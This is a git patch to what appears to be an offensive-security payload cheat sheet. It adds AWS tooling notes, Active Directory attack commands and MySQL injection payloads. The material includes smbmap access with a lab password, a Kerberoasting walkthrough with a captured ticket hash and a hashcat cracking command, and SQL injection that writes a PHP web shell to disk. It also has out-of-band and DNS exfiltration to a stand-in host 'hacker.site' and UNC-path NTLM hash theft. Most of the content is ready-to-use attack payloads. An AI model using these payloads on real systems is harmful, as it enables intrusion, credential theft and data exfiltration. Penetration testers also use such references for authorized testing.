From d5478d1fd69ee8dda842a746107c6f0bf8606a1f Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Tue, 25 Dec 2018 19:38:37 +0100
Subject: [PATCH] AWS Pacu and sections + Kerberoasting details

---
 AWS Amazon Bucket S3/README.md                |  9 +++++
 .../Active Directory Attack.md                | 16 +++++++-
 SQL injection/MySQL Injection.md              | 39 ++++++++++++++++---
 3 files changed, 56 insertions(+), 8 deletions(-)

diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index af9e326..0ac413b 100644
--- a/AWS Amazon Bucket S3/README.md	
+++ b/AWS Amazon Bucket S3/README.md	
@@ -1,5 +1,12 @@
 # Amazon Bucket S3 AWS
 
+## Tools
+
+- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
+
+
+## AWS Configuration
+
 Prerequisites, at least you need awscli
 
 ```bash
@@ -21,6 +28,8 @@ aws configure --profile nameofprofile
 
 then you can use *--profile nameofprofile* in the aws command
 
+## Open Bucket
+
 By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
 
 ```bash
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index d489d42..6b27442 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -82,6 +82,14 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 
 ## Open Shares
 
+```powershell
+smbmap -H 10.10.10.100    # null session
+smbmap -H 10.10.10.100 -R # recursive listing
+smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
+```
+
+or 
+
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
 ls  # list files
@@ -333,8 +341,12 @@ TODO
 
 ### Kerberoast
 
+> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
+
+Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
+
 ```powershell
-$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
+$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
 
 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
 
@@ -345,7 +357,7 @@ active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=
 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
 ```
 
-Then crack the hash with hashcat or john
+Then crack the ticket with hashcat or john
 
 ```powershell
 hashcat -m 13100 -a 0 hash.txt crackstation.txt
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index f90978a..1d7207d 100644
--- a/SQL injection/MySQL Injection.md	
+++ b/SQL injection/MySQL Injection.md	
@@ -1,12 +1,12 @@
 # MYSQL Injection
 
-## MySQL
+## MYSQL
 
 ```sql
 # MYSQL Comment
 /* MYSQL Comment */
 /*! MYSQL Special SQL */
-/*!32302 10*/ Comment for MySQL version 3.23.02
+/*!32302 10*/ Comment for MYSQL version 3.23.02
 ```
 
 ## Detect columns number
@@ -21,7 +21,7 @@ order by 3
 order by XXX
 ```
 
-## MySQL Union Based
+## MYSQL Union Based
 
 ```sql
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
@@ -30,7 +30,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 
-## MySQL Error Based - Basic
+## MYSQL Error Based - Basic
 
 ```sql
 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
@@ -109,7 +109,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 ```
 
-## MySQL DIOS - Dump in One Shot
+## MYSQL DIOS - Dump in One Shot
 
 ```sql
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
@@ -126,4 +126,31 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
 [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
 
-## References
\ No newline at end of file
+## MYSQL Out of band
+
+```powershell
+select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
+select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt
+```
+
+DNS exfiltration
+
+```sql
+select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
+select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))
+```
+
+UNC Path - NTLM hash stealing
+
+```sql
+select load_file('\\\\error\\abc');
+select load_file(0x5c5c5c5c6572726f725c5c616263);
+select 'osanda' into dumpfile '\\\\error\\abc';
+select 'osanda' into outfile '\\\\error\\abc';
+load data infile '\\\\error\\abc' into table database.table_name;
+```
+
+
+## References
+
+- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
\ No newline at end of file